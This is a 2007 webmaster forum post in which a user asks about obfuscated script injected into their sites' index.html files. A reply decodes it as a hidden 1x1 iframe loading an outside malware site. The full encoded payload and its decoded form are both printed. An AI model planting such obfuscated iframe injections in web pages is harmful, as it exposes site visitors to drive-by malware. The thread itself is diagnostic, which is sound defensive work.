Thread: What is this malicious injected code all about?
View Single Post
Old 11-21-2007, 09:21 AM  
yahoo-xxx-girls.com
Confirmed User
 
yahoo-xxx-girls.com's Avatar
 
Join Date: Jul 2006
Location: Canada
Posts: 3,143
Fun with hex.
Quote:
Originally Posted by jetjet View Post
I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?


this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

Your code converts to this:

<script>eval(unescape(document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');));</script>


.
__________________
sig too big
yahoo-xxx-girls.com is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote